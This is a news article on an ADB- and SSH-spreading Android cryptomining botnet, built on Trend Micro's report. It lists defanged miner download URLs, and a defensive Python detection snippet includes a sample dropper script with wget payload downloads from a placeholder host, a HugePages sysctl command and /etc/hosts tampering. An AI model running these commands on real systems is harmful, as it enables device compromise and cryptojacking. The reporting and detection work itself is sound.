Android cryptomining botnet is the new bad kid on the block

Security researchers are sounding the alarm about a new cryptomining botnet that, admittedly, does not have a catchy name yet. The botnet, as Trend Micro’s Jindrich Karasek reports, leverages open ADB (Android Debug Bridge) ports and spreads via SSH. What allows it to prey specifically on Android devices is, according to Karasek, the fact that ADB does not require authentication by default; once on a device, the malicious code then spreads to any host that has previously had an SSH connection with the infected device.

Karasek gives the specifics about the payload in the Android cryptomining botnet in this excerpt from the report:

The script for a.sh reveals that this attack will choose from three different downloadable miners. This can be seen in the output of the “uname -m” command... The uname -m command, once executed, gets the infected system’s information, such as its manufacturer, hardware details, and processor architecture. The output from this command is used as a variable for determining the miner to use in the attack... The three miners that can be used for this attack are listed below, all of which are delivered by the same URL.

  • http://198[.]98[.]51[.]104:282/x86/bash
  • http://198[.]98[.]51[.]104:282/arm/bash
  • http://198[.]98[.]51[.]104:282/aarch64/bash

To optimize the mining activity, the script also enhances the victim’s memory by enabling HugePages, which will help the system support memory pages that are greater than its default size. This ability can be seen in the script as “/sbin/sysctl -w vm.nr_hugepages=128”. This botnet also tries to block its competitor by modifying /etc/hosts... After spreading to other devices connected to the system, it deletes its payload files, removing the traces on the victim host.
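The behaviours the excerpt attributes to a.sh (architecture-keyed miner selection, the HugePages sysctl, the /etc/hosts edit and the cleanup step) are concrete enough to write a triage check against. The following is an added example, not Trend Micro's or the botnet's code: it scans a constructed sample script for those behaviours and lists /etc/hosts entries that sinkhole hostnames; the sample script, the placeholder host, the pool names and the indicator names are all assumptions.

```python
import re

# Constructed sample modelled on the behaviours the report attributes to a.sh.
# Not the real script; PLACEHOLDER-HOST stands in for the download server.
SAMPLE_SCRIPT = """#!/bin/sh
ARCH=$(uname -m)
case "$ARCH" in
  x86_64)  wget http://PLACEHOLDER-HOST:282/x86/bash -O /tmp/bash ;;
  arm*)    wget http://PLACEHOLDER-HOST:282/arm/bash -O /tmp/bash ;;
  aarch64) wget http://PLACEHOLDER-HOST:282/aarch64/bash -O /tmp/bash ;;
esac
/sbin/sysctl -w vm.nr_hugepages=128
echo "0.0.0.0 rival-pool.example" >> /etc/hosts
rm -f /tmp/bash a.sh
"""
# Constructed /etc/hosts showing the "block the competitor" edit.
SAMPLE_HOSTS = """127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
0.0.0.0 rival-pool.example   # added by the dropper
127.0.0.1 another-pool.example
"""
# One rule per behaviour named in the report; the rule names are ours.
INDICATORS = {
    "arch_switch": re.compile(r"\buname\s+-m\b"),
    "arch_payload_path": re.compile(r"/(x86|arm|aarch64)/bash\b"),
    "hugepages_tuning": re.compile(r"sysctl\s+-w\s+vm\.nr_hugepages=\d+"),
    "hosts_tampering": re.compile(r">>?\s*/etc/hosts\b"),
    "self_cleanup": re.compile(r"\brm\b[^\n]*\ba\.sh\b"),
}

def scan_script(text):
    """Return the names of every indicator whose pattern matches the script."""
    return {name for name, pat in INDICATORS.items() if pat.search(text)}

def triage(text, threshold=3):
    """Flag a script as suspicious only when several behaviours co-occur."""
    hits = scan_script(text)
    return {"hits": sorted(hits), "suspicious": len(hits) >= threshold}

LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
NULL_ADDRS = {"0.0.0.0", "127.0.0.1", "::1"}

def find_hosts_sinkholes(hosts_text):
    """Hostnames pinned to a null/loopback address, ignoring the usual local names."""
    flagged = []
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()   # drop comments, tokenise
        if fields and fields[0] in NULL_ADDRS:
            flagged.extend(n for n in fields[1:] if n not in LOCAL_NAMES)
    return flagged
```

On a real host, feed `find_hosts_sinkholes` the contents of /etc/hosts and `triage` any shell script found in a temporary directory; a high hit count alongside `vm.nr_hugepages` set to a non-default value is worth a closer look.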

While this is not the first cryptomining botnet to be seen in the wild, its ability to form a literal battalion of Android zombie devices is rather concerning. Disabling ADB and changing its default settings should offer some protection against becoming part of the botnet. Paying attention to the apps you install should be a given anyway, but especially in this case, since certain apps (according to Trend Micro) can leverage this vulnerability. Finally, there are mobile security applications that detect malicious activity of this specific type and can protect you.


Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.
